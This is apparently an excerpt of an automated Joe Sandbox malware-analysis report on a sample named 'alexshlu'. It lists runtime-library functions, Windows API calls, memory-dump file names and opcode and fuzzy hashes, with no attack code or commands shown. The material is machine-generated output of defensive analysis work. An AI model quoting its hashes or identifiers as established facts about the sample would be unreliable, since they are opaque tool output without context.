                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A547C
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A549A
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A54BC
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A552A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 593203224-0
                                                                                                                                                                                                                                        • Opcode ID: 06472d39429daff5e010443fc1f1cee7569db329303dc85e9988bc2387114a17
                                                                                                                                                                                                                                        • Instruction ID: a26684f3c98710f8dd840d19b68bd90862d622042838949730fe49bdc543e937
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 06472d39429daff5e010443fc1f1cee7569db329303dc85e9988bc2387114a17
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E1219171D156209FC710EF19F949A1AB3A0EF5A724F05485EE4484B361EF34AD60CF92
                                                                                                                                                                                                                                        Function 002C06F6 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 002BA9E1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,002BC231,?,00000000,-00000008), ref: 002BAA42
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 002C075A
                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 002C0761
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 002C079B
                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 002C07A2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1913693674-0
                                                                                                                                                                                                                                        • Opcode ID: da6f5ff6619ca3e0e2a667d7ce335eaef3b8311e417aa00a8dde3b444c208752
                                                                                                                                                                                                                                        • Instruction ID: 80cf232fc251e65f0eafb7a68601cebe25cc1f9c46a41a36dbfe597ab469b40e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: da6f5ff6619ca3e0e2a667d7ce335eaef3b8311e417aa00a8dde3b444c208752
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D521AF71A24206EF9B24AF61DCC4E6BB7A9AF103A4750861DF81997251E730FC648FA0
                                                                                                                                                                                                                                        Function 002B0C62 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 6654444c3d196b2a7c9086bf9362a523af7a77004acbe4ec7c5ba568447d00ec
                                                                                                                                                                                                                                        • Instruction ID: f7a4aebe6ff3a591192760adb73fb0ebead9aa91dd85f7452acaab698cb3973f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6654444c3d196b2a7c9086bf9362a523af7a77004acbe4ec7c5ba568447d00ec
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5221C37162420AAFDB12AFA5DCC59EB7BA8EF043E87104A15F915D7191EB70FC608B90
                                                                                                                                                                                                                                        Function 002C1AEC Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 002C1AF4
                                                                                                                                                                                                                                          • Part of subcall function 002BA9E1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,002BC231,?,00000000,-00000008), ref: 002BAA42
                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002C1B2C
                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002C1B4C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 158306478-0
                                                                                                                                                                                                                                        • Opcode ID: 182ce22d98763f00ef760e1e28f2c779672896dbb7f28693271f334ada663977
                                                                                                                                                                                                                                        • Instruction ID: c108eec3ed938d6cc8981e846a859a276a8ed5a6f7a3ce15a2e42e5da8f5e7d3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 182ce22d98763f00ef760e1e28f2c779672896dbb7f28693271f334ada663977
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D11C8A19315167E67112771AD8FDAF7A5CDD563E87100229F50191102FE608E319EB2
                                                                                                                                                                                                                                        Function 002ACB2A Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 002ACB31
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002ACB3B
                                                                                                                                                                                                                                        • int.LIBCPMT ref: 002ACB52
                                                                                                                                                                                                                                          • Part of subcall function 002AA613: std::_Lockit::_Lockit.LIBCPMT ref: 002AA624
                                                                                                                                                                                                                                          • Part of subcall function 002AA613: std::_Lockit::~_Lockit.LIBCPMT ref: 002AA63E
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002ACBAC
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1383202999-0
                                                                                                                                                                                                                                        • Opcode ID: 93881a989bcc5c360a8094e821c8721275f134351a363febd9c97604befb4257
                                                                                                                                                                                                                                        • Instruction ID: c7467a72e1189cf3f15b4167dd46e397afb8495fddc2ed64d07252d0c82093dd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93881a989bcc5c360a8094e821c8721275f134351a363febd9c97604befb4257
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C11E131C2411A8BCB05EFA4D94A6BDB775AF46728F24480AE4116B381DF749E20CFA1
                                                                                                                                                                                                                                        Function 002C99D0 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,002C8EBF,00000000,00000001,00000000,?,?,002C2CBC,?,00000000,00000000), ref: 002C99E7
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,002C8EBF,00000000,00000001,00000000,?,?,002C2CBC,?,00000000,00000000,?,?,?,002C2602,00000000), ref: 002C99F3
                                                                                                                                                                                                                                          • Part of subcall function 002C9A44: CloseHandle.KERNEL32(FFFFFFFE,002C9A03,?,002C8EBF,00000000,00000001,00000000,?,?,002C2CBC,?,00000000,00000000,?,?), ref: 002C9A54
                                                                                                                                                                                                                                        • ___initconout.LIBCMT ref: 002C9A03
                                                                                                                                                                                                                                          • Part of subcall function 002C9A25: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,002C99C1,002C8EAC,?,?,002C2CBC,?,00000000,00000000,?), ref: 002C9A38
                                                                                                                                                                                                                                        • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,002C8EBF,00000000,00000001,00000000,?,?,002C2CBC,?,00000000,00000000,?), ref: 002C9A18
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2744216297-0
                                                                                                                                                                                                                                        • Opcode ID: 4ce98d8e452c6a2f14363cbddeffb7941e50eb03784f5d3ea4a9f0364275641c
                                                                                                                                                                                                                                        • Instruction ID: e35fc91e9444392d0eff6c11106f426f5c0abec80b421251d47aeced970e5a62
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ce98d8e452c6a2f14363cbddeffb7941e50eb03784f5d3ea4a9f0364275641c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43F01C36811229BFCF226F91EC0CE893F66FB487A0F104515FE1D95160D6328DA0EB91
                                                                                                                                                                                                                                        Function 002AE5C7 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 002AE5D9
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 002AE5E8
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 002AE5F1
                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 002AE5FE
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                                                                                        • Opcode ID: 6908aec6b1052d9a570ecb49a48a929965c5ed32083dcbbc439ea004506730ef
                                                                                                                                                                                                                                        • Instruction ID: 2ce6224cc3061221171bd5515d8034012c840288d948b4fd6b76695db0f9873e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6908aec6b1052d9a570ecb49a48a929965c5ed32083dcbbc439ea004506730ef
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2DF06274D1120DEFCB00DBB4D94999EBBF4FF1C204BA18996E412E7550E730AB449B51
                                                                                                                                                                                                                                        Function 002BA350 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,002BA251,?,?,00000000,00000000,00000000,?), ref: 002BA375
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: EncodePointer
                                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                                        • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                        • Opcode ID: 79a7fc3d7825dedc08a5e8ef239f1b3381193a4068c16fc924a6d36cba48ff39
                                                                                                                                                                                                                                        • Instruction ID: 3fce51ac08676d8b331f2fe1afcf819fd9583961faab45f24444090a38eb7f15
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 79a7fc3d7825dedc08a5e8ef239f1b3381193a4068c16fc924a6d36cba48ff39
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F41883191020AEFCF15DF98CC85AEEBBB6BF08340F148099F90567221D375AA61DF52
                                                                                                                                                                                                                                        Function 002B9BBC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 002B9E33
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                                                                                        • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                        • Opcode ID: ad9516d56ba157a61532a38ec507bf8c3716fb426b1c19eba8810173cd706cce
                                                                                                                                                                                                                                        • Instruction ID: 11c25cb41012ab17e458cb0874ad5cd2a7c98e95c424e9941fe9e469cede6107
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad9516d56ba157a61532a38ec507bf8c3716fb426b1c19eba8810173cd706cce
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6431943282021A9BCF268F54C8449FA7BA9FF093A5B14815AFA9499121C377DCF1DB91
                                                                                                                                                                                                                                        Function 002A2A40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: GetctypeLockitLockit::_std::_
                                                                                                                                                                                                                                        • String ID: ios_base::badbit set
                                                                                                                                                                                                                                        • API String ID: 2423992667-3882152299
                                                                                                                                                                                                                                        • Opcode ID: 13db60fffc45737845740290ca746f6c6638da60a477b59e209dfb35cb30db0e
                                                                                                                                                                                                                                        • Instruction ID: 443adecab8155a0d4194ba72d749553157e6a29570b1cf1e5f95b2f412795fa0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 13db60fffc45737845740290ca746f6c6638da60a477b59e209dfb35cb30db0e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2631F5B19187848BE310DF29C85531BBBE4AFE5308F04491CF5884B242EB75E5A8CBD3
                                                                                                                                                                                                                                        Function 0040B670 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                                        • String ID: Wu
                                                                                                                                                                                                                                        • API String ID: 3664257935-4083010176
                                                                                                                                                                                                                                        • Opcode ID: 6425bf85f61168730cf8aa86984bf8b6e917edd52b7c815baf6d9195e9542296
                                                                                                                                                                                                                                        • Instruction ID: 85dcaa2462d9c45145e65ac06ae9ca42faece8067be7f15f26664216f34aa8a8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6425bf85f61168730cf8aa86984bf8b6e917edd52b7c815baf6d9195e9542296
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48C002798005019BCE413FA1FC0AC1C3A22EF46F5A7010138F80192032EE3309A1BB6A